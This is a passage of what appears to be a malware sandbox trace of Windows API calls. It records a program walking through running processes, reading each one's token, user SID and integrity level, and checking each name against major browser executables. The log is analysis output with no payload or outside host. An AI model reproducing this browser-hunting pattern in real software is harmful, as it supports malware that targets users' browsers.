TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.324] GetLastError () returned 0x7a [0237.324] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.325] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.325] CloseHandle (hObject=0xb8) returned 1 [0237.325] CloseHandle (hObject=0xb4) returned 1 [0237.325] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.325] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.325] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.325] GetLastError () returned 0x7a [0237.325] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.325] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.325] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.325] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0237.325] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0237.325] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0237.325] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0237.325] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0237.325] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0237.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xb4 [0237.325] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.325] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.325] GetLastError () returned 0x7a [0237.325] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.325] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.325] CloseHandle (hObject=0xb8) returned 1 [0237.325] CloseHandle (hObject=0xb4) returned 1 [0237.325] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.325] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.325] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.325] GetLastError () returned 0x7a [0237.325] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.325] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.325] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.325] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0237.325] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0237.326] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0237.326] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0237.326] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0237.326] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0237.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xb4 [0237.326] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.326] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.326] GetLastError () returned 0x7a [0237.326] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.326] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.326] CloseHandle (hObject=0xb8) returned 1 [0237.326] CloseHandle (hObject=0xb4) returned 1 [0237.326] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.326] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.326] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.326] GetLastError () returned 0x7a [0237.326] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.326] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.326] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.326] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0237.326] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0237.326] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0237.326] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0237.326] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0237.326] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0237.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xb4 [0237.326] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.326] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.326] GetLastError () returned 0x7a [0237.326] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.326] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.326] CloseHandle (hObject=0xb8) returned 1 [0237.326] CloseHandle (hObject=0xb4) returned 1 [0237.326] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.326] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.327] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.327] GetLastError () returned 0x7a [0237.327] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.327] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.327] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.327] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0237.327] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0237.327] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0237.327] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0237.327] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0237.327] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0237.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xb4 [0237.327] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.327] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.327] GetLastError () returned 0x7a [0237.327] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.327] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.327] CloseHandle (hObject=0xb8) returned 1 [0237.327] CloseHandle (hObject=0xb4) returned 1 [0237.327] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.327] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.327] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.327] GetLastError () returned 0x7a [0237.327] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.327] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.327] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.327] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0237.327] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0237.327] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0237.327] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0237.327] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0237.327] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0237.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xb4 [0237.327] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.327] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.327] GetLastError () returned 0x7a [0237.328] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.328] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.328] CloseHandle (hObject=0xb8) returned 1 [0237.328] CloseHandle (hObject=0xb4) returned 1 [0237.328] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.328] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.328] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.328] GetLastError () returned 0x7a [0237.328] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.328] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.328] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.328] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0237.328] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0237.328] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0237.328] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0237.328] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0237.328] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0237.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xb4 [0237.328] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.328] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.328] GetLastError () returned 0x7a [0237.328] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.328] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.328] CloseHandle (hObject=0xb8) returned 1 [0237.328] CloseHandle (hObject=0xb4) returned 1 [0237.328] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.328] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.328] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.328] GetLastError () returned 0x7a [0237.328] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.328] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.328] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.328] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0237.329] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0237.329] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0237.329] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0237.329] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0237.329] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0237.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xb4 [0237.329] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.329] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.329] GetLastError () returned 0x7a [0237.329] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.329] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.329] CloseHandle (hObject=0xb8) returned 1 [0237.329] CloseHandle (hObject=0xb4) returned 1 [0237.329] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.329] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.329] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.329] GetLastError () returned 0x7a [0237.329] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.329] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.329] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.329] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0237.329] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0237.329] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0237.329] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0237.329] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0237.329] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0237.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xb4 [0237.329] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.329] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.329] GetLastError () returned 0x7a [0237.329] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.329] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.329] CloseHandle (hObject=0xb8) returned 1 [0237.329] CloseHandle (hObject=0xb4) returned 1 [0237.329] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.330] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.330] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.330] GetLastError () returned 0x7a [0237.330] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.330] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.330] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.330] lstrcmpiW (lpString1="firefox.exe", lpString2="WINWORD.EXE") returned -1 [0237.330] lstrcmpiW (lpString1="chrome.exe", lpString2="WINWORD.EXE") returned -1 [0237.330] lstrcmpiW (lpString1="opera.exe", lpString2="WINWORD.EXE") returned -1 [0237.330] lstrcmpiW (lpString1="iexplore.exe", lpString2="WINWORD.EXE") returned -1 [0237.330] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="WINWORD.EXE") returned -1 [0237.330] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="WINWORD.EXE") returned -1 [0237.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0237.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0237.330] OpenProcess 